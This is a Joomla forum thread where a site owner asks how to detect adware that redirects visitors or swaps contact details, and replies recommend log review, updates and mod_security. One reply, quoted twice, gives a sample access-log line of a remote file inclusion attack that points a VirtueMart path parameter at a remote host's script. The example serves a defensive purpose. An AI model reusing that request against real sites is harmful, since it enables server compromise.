Malware/Adware/Spyware Browser Redirects and Content Injects

[ledneonflex]

Hi,

What is the best way to determine if your website is a target of malware/adware redirects or website content injections via browser?

We have found PC's in the past that redirect our site to a competitors using the browser and have also found content such as contact details and phone numbers being replaced by competitors.

Any information to help determine this fact would be greatly appreciated. Most often this form of marketing goes by without the site admins detection since it's not server side.

Thanks

Derek

[GarfieldLeChat]

is it a Joomla based site?

Pay a security professional is the answer. some one who will diagnose the problem and fix it and harden up your site secutiry.

oh and I'd pay for some training of your sites admins too as they clearly don't know enough unless this is a virus/trojan related problem in which case you have to have been corportately significant enough to be able to afford security professionals to resolve this.

[ledneonflex]

is it a Joomla based site?

Pay a security professional is the answer. some one who will diagnose the problem and fix it and harden up your site secutiry.

oh and I'd pay for some training of your sites admins too as they clearly don't know enough unless this is a virus/trojan related problem in which case you have to have been corportately significant enough to be able to afford security professionals to resolve this.

It's not server side related, it's the users browser with malicious adware/spyware installed.. I'm asking if anyone knows of a way to test for this kind activity.

Thank you for the feedback though.

[GarfieldLeChat]

is it a Joomla based site?

Pay a security professional is the answer. some one who will diagnose the problem and fix it and harden up your site secutiry.

oh and I'd pay for some training of your sites admins too as they clearly don't know enough unless this is a virus/trojan related problem in which case you have to have been corportately significant enough to be able to afford security professionals to resolve this.

It's not server side related, it's the users browser with malicious adware/spyware installed.. I'm asking if anyone knows of a way to test for this kind activity.

Thank you for the feedback though.

sorry still don't get what you're driving at this is a joomla help and community forum.

Are you asking is it possible to hijack a brower via malicious code in which case the answers yes. If you are asking if it's possible to tell which browsers come to your site using malcious code then possbily, but you'd need to pay someone to do it. and it would entirely depend on what you were looking for v's the cost of having something bespoke programed.

But this isn't really what these forums are for unless it's joomla related.

[ledneonflex]

is it a Joomla based site?

Pay a security professional is the answer. some one who will diagnose the problem and fix it and harden up your site secutiry.

oh and I'd pay for some training of your sites admins too as they clearly don't know enough unless this is a virus/trojan related problem in which case you have to have been corportately significant enough to be able to afford security professionals to resolve this.

It's not server side related, it's the users browser with malicious adware/spyware installed.. I'm asking if anyone knows of a way to test for this kind activity.

Thank you for the feedback though.

sorry still don't get what you're driving at this is a joomla help and community forum.

Are you asking is it possible to hijack a brower via malicious code in which case the answers yes. If you are asking if it's possible to tell which browsers come to your site using malcious code then possbily, but you'd need to pay someone to do it. and it would entirely depend on what you were looking for v's the cost of having something bespoke programed.

But this isn't really what these forums are for unless it's joomla related.

I understand this. I'm asking if anyone knows of any tools that can test if adware/malware/spyware etc.. is targeting your site weather it's Joomla or not. Reason I ask in this forum is that the knowledge here is greater than most other forum and more subscribers.

Thank you for the feedback!

[dynamicnet]

Greetings:

* Do make sure you've followed the security check list for your joomla installation.

* Make sure your Joomla is up to date; do subscribe to the Joomla security newsletter for new releases based on security updates.

* Do review your web site logs.

In the past few years, most hacks are based on web site injection attacks where the attacker alters the URL (web page / web site address) to include code to inject malware or otherwise test if a site can be compromised.

An example of what you might see for an injection is as follows:

"GET /index.php?option=com_content&task=view&id=572&Itemid=84//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hit168.com.cn/idanyar.txt??? HTTP/1.1" 500 3560 "-" "libwww-perl/5.805" SnXJG0YmP6kAAEcEHMI "-"

* Do ask your hosting provider to use mod_security from http://www.modsecurity.org/ as that can help reduce the number of injections that get through; it is not fool proof, and your provider may have to go through some fine tuning to remove false positives.

Thank you.

[GarfieldLeChat]

Greetings:

* Do make sure you've followed the security check list for your joomla installation.

* Make sure your Joomla is up to date; do subscribe to the Joomla security newsletter for new releases based on security updates.

* Do review your web site logs.

In the past few years, most hacks are based on web site injection attacks where the attacker alters the URL (web page / web site address) to include code to inject malware or otherwise test if a site can be compromised.

An example of what you might see for an injection is as follows:

"GET /index.php?option=com_content&task=view&id=572&Itemid=84//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hit168.com.cn/idanyar.txt??? HTTP/1.1" 500 3560 "-" "libwww-perl/5.805" SnXJG0YmP6kAAEcEHMI "-"

* Do ask your hosting provider to use mod_security from http://www.modsecurity.org/ as that can help reduce the number of injections that get through; it is not fool proof, and your provider may have to go through some fine tuning to remove false positives.

Thank you.

see all of this is generic advice which isn't actually what they appear to be asking which seems to be if I've got this right can a site owner tell which infected browsers from a machine or set of machines are visiting their site...

And the answer is specailist bespoke programming not generalised advice i'm afraid.

If your site is being hit with big old attacks focused from a particlar source or sources then it's unlikely that the browser the user is using will affect your machine unless it's being used to directly launch attacks as part of a wider campagin (ie zombie machine). you'll then get an ip address in your log files of that machine and in effect a browser code however you'd be hard pressed to tell which is which without some kind of interpretation and even hard pressed to prove that a user going to your site with malicious code in their browser was doing so knowingly... proving intent will be the downfall...

[dynamicnet]

Greetings:

I believe my answer dealt specifically with "What is the best way to determine if your website is a target of malware/adware redirects or website content injections via browser?" which is to review the web site logs and that will tell if attacks are incoming.

It is possible I misunderstood the question, and then the answer, of course, would be different.

Thank you.

[ledneonflex]

http://en.wikipedia.org/wiki/Cross-site_scripting

Is Joomla 1.0.13 vulnerable to xss?

[dynamicnet]

Greetings:

If you are not on the current version, then you are vulnerable.

Thank you.

[ledneonflex]

Hi.. Yah it's slightly out of date.. we are in the process of upgrading to 1.5.. template is done and revised. Just porting over content and cleaning up the old site and making navigation much better as the old site is horrible.

Should be done soon. Is 1.5 vulnerable to xss? Anyone hear of any issues?

Thanks for all the feedback on this issue. Joomla forums are and always have been my favorite source to information regarding almost anything web related.

[dynamicnet]

Greetings:

The latest release is clean for XSS attacks as far as I know... but if your security administrator installs mod_security on the server that will help as well.

Thank you.